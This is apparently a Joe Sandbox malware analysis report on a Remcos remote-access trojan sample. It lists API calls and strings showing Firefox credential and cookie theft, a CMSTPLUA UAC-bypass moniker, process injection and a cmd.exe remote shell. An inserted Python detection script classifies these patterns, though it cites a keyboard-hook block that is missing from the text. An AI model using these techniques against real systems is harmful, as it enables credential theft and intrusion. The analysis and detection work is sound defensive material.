• GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
Strings
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: GlobalMemoryStatus
• String ID: @
• API String ID: 1890195054-2766056989

APIs
• _free.LIBCMT ref: 00446227
  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
• RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: AllocateHeap$_free
• String ID:
• API String ID: 1482568997-0

APIs
• socket.WS2_32(?,00000001,00000006), ref: 00404852
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
Memory Dump Source
• Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
Yara matches
Similarity
• API ID: CreateEventStartupsocket
• String ID:
• API String ID: 1953588214-0
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 0041BB49
                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$ForegroundText
                                                                                          • String ID:
                                                                                          • API String ID: 29597999-0
                                                                                          APIs
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 176396367-0
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          APIs
                                                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Startup
                                                                                          • String ID:
                                                                                          • API String ID: 724789610-0
                                                                                          APIs
                                                                                          • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Deallocatestd::_
                                                                                          • String ID:
                                                                                          • API String ID: 1323251999-0
                                                                                          APIs
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: recv
                                                                                          • String ID:
                                                                                          • API String ID: 1507349165-0
                                                                                          APIs
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: send
                                                                                          • String ID:
                                                                                          • API String ID: 2809346765-0
                                                                                          APIs
                                                                                          • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                          • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                                          • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                                                                          • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                          • CloseHandle.KERNEL32 ref: 00405A23
                                                                                          • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                          • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                          • CloseHandle.KERNEL32 ref: 00405A45
                                                                                          Strings
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                          • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                          • API String ID: 2994406822-18413064
                                                                                          APIs
                                                                                          • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                          • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                            • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                            • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                            • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                          • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                            • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                            • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                            • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                            • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                          • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                          • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                                                            • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                          Strings
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                          • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                                          • API String ID: 1067849700-1507758755
                                                                                          APIs
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                            • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                          • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                          Strings
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                          • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                          • API String ID: 3018269243-13974260
                                                                                          • Opcode ID: b3951b22144ccdf2d4cd1ddf70918f5d541b623d2cb9c2a4b7a34346c44b0be3
                                                                                          • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                                          • Opcode Fuzzy Hash: b3951b22144ccdf2d4cd1ddf70918f5d541b623d2cb9c2a4b7a34346c44b0be3
                                                                                          • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                                          APIs
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                          • API String ID: 1164774033-3681987949
                                                                                          • Opcode ID: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                                                          • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                          • Opcode Fuzzy Hash: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                                                          • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                          APIs
                                                                                          • OpenClipboard.USER32 ref: 004168FD
                                                                                          • EmptyClipboard.USER32 ref: 0041690B
                                                                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                                          • CloseClipboard.USER32 ref: 00416990
                                                                                          • OpenClipboard.USER32 ref: 00416997
                                                                                          • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                          • CloseClipboard.USER32 ref: 004169BF
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                          • String ID: !D@
                                                                                          • API String ID: 3520204547-604454484
                                                                                          • Opcode ID: 257326ec153dacac18454150c5240309e865c30b0bc4197c45747697bab63ef0
                                                                                          • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                                          • Opcode Fuzzy Hash: 257326ec153dacac18454150c5240309e865c30b0bc4197c45747697bab63ef0
                                                                                          • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                                          APIs
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$Close$File$FirstNext
                                                                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                          • API String ID: 3527384056-432212279
                                                                                          • Opcode ID: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                                                          • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                          • Opcode Fuzzy Hash: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                                                          • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                          APIs
                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                          • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                          • String ID:
                                                                                          • API String ID: 297527592-0
                                                                                          • Opcode ID: 508c16f966a808e54501f7bca4be6d297b5a0c623f3719da694ed0cdf11329f0
                                                                                          • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                                          • Opcode Fuzzy Hash: 508c16f966a808e54501f7bca4be6d297b5a0c623f3719da694ed0cdf11329f0
                                                                                          • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                          • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                          • API String ID: 3756808967-1743721670
                                                                                          • Opcode ID: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                                                          • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                                          • Opcode Fuzzy Hash: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                                                          • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0$1$2$3$4$5$6$7
                                                                                          • API String ID: 0-3177665633
                                                                                          • Opcode ID: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                                                          • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                                          • Opcode Fuzzy Hash: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                                                          • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 0040755C
                                                                                          • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object_wcslen
                                                                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                          • API String ID: 240030777-3166923314
                                                                                          • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                          • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                          • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                          • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
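Added example, not part of the Joe Sandbox report and not code from the Remcos sample: a small Python parser and classifier for the "APIs" and "String ID" bullets in this listing. It decodes the raw hex arguments the report prints against their Windows SDK meaning (001FFFFF to OpenProcess is PROCESS_ALL_ACCESS, 00000002 to CreateToolhelp32Snapshot is TH32CS_SNAPPROCESS, 0000000D to SetWindowsHookExA is WH_KEYBOARD_LL) and tags each function with the behaviour its calls and strings imply: the "Elevation:Administrator!new:" moniker plus the CMSTPLUA CLSID {3E5FC7F9-9A51-4367-9063-A120244FBEC7} handed to CoGetObject in the block above, the Firefox profile store deletion, the Toolhelp process walk that looks for ieinstal.exe and ielowutil.exe, and the low-level keyboard hook from the SetWindowsHookExA block later in this section. The constructed input is a handful of bullets copied from this page with their indentation removed; the tag names, the access-mask threshold and the "cleared" heuristic are this example's own choices, not anything the report defines.

```python
import re
from dataclasses import dataclass, field

# Bullet shapes used by the report: "API.MODULE(args), ref: addr" and "String ID: a$b$c".
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
STRING_RE = re.compile(r"•\s*String ID:\s*(?P<ids>.*)$")

# Windows SDK values behind the raw hex the report prints.
PROCESS_ALL_ACCESS = 0x1FFFFF
PROCESS_CREATE_THREAD, PROCESS_VM_WRITE = 0x0002, 0x0020
WH_KEYBOARD, WH_KEYBOARD_LL, TH32CS_SNAPPROCESS = 2, 13, 0x2
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"  # ICMLuaUtil, auto-elevated COM class
FIREFOX_STORES = ("\\logins.json", "\\key3.db", "\\key4.db", "\\cookies.sqlite")

@dataclass
class Call:
    api: str
    module: str
    args: list            # raw tokens as printed: hex, '?' or a string literal
    ref: str
    subcall: str = ""     # address of the subcall function, when the bullet says so

    def arg_int(self, i):  # hex argument i, or None when it is '?', a string or absent
        try:
            return int(self.args[i], 16)
        except (IndexError, ValueError):
            return None

@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)

def parse_blocks(text):
    """One FunctionBlock per function; a block ends at its 'Instruction Fuzzy Hash' line."""
    blocks, cur = [], FunctionBlock()
    for line in text.splitlines():
        call, sid = CALL_RE.search(line), STRING_RE.search(line)
        if call:
            args = [a.strip() for a in (call["args"] or "").split(",") if a.strip()]
            cur.calls.append(Call(call["api"], call["mod"], args, call["ref"].upper(), call["sub"] or ""))
        elif sid:
            cur.strings.extend(s for s in sid["ids"].split("$") if s)
        elif "Instruction Fuzzy Hash:" in line:
            blocks.append(cur)
            cur = FunctionBlock()
    if cur.calls or cur.strings:          # trailing block without its hash line
        blocks.append(cur)
    return blocks

def analyse(block):
    """Behaviour tags implied by one block's calls and strings (tag names are this example's)."""
    tags, apis, joined = set(), {c.api for c in block.calls}, "\x00".join(block.strings)
    # CMSTPLUA auto-elevation: elevation moniker plus the CMSTPLUA CLSID handed to CoGetObject.
    if "CoGetObject" in apis and "Elevation:Administrator!new:" in joined and CMSTPLUA_CLSID in joined:
        tags.add("uac-bypass-cmstplua")
    for c in block.calls:
        if c.api == "OpenProcess":
            access = c.arg_int(0) or 0
            if access == PROCESS_ALL_ACCESS or access & (PROCESS_VM_WRITE | PROCESS_CREATE_THREAD):
                tags.add("open-process-write-access")   # enough for injection; 0x1000/0x400 are not
        elif c.api in ("SetWindowsHookExA", "SetWindowsHookExW") and c.arg_int(0) in (WH_KEYBOARD, WH_KEYBOARD_LL):
            tags.add("keyboard-hook")
        elif c.api == "CreateToolhelp32Snapshot" and c.arg_int(0) == TH32CS_SNAPPROCESS:
            tags.add("process-enumeration")
    if "\\Mozilla\\Firefox\\Profiles\\" in joined and any(s in joined for s in FIREFOX_STORES):
        tags.add("firefox-store-access")
        if "cleared" in joined.lower():       # the sample's own status strings say what it did
            tags.add("firefox-store-wipe")
    if "process-enumeration" in tags and any(s.lower().endswith(".exe") for s in block.strings):
        tags.add("target-process-by-name")
    return tags

def summarise(text):
    """[(address of the block's first call, sorted tags)] for every flagged block."""
    return [(b.calls[0].ref, sorted(t)) for b in parse_blocks(text)
            for t in [analyse(b)] if t and b.calls]

# Constructed input: bullets copied from this report's listing, indentation removed.
SAMPLE = r"""
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
• String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$rmclient.exe$svchost.exe
• Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
• String ID: [Firefox StoredLogins Cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
• Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
• String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
• Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
• CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
• SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
"""
```

summarise(SAMPLE) returns one entry per block here, keyed by the address of the block's first call, so the tags can be lined up with the "ref:" addresses in the listing. Fed the whole listing instead of the excerpt, the clipboard, file-mapping, service-enumeration and recursive-delete blocks come back untagged, which is the intended behaviour: the classifier only speaks to the four patterns it knows, and the 0x1000 and 0x400 OpenProcess masks in the Toolhelp block are deliberately left alone because they only grant query rights.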
                                                                                          APIs
                                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                          • GetLastError.KERNEL32 ref: 0041A84C
                                                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                          • String ID:
                                                                                          • API String ID: 3587775597-0
                                                                                          • Opcode ID: 7c9047ccdf8dbfe0cedaf63b80d6fa4b4da9c7c1e4027b9493b0733bf6fd85a3
                                                                                          • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                          • Opcode Fuzzy Hash: 7c9047ccdf8dbfe0cedaf63b80d6fa4b4da9c7c1e4027b9493b0733bf6fd85a3
                                                                                          • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                          APIs
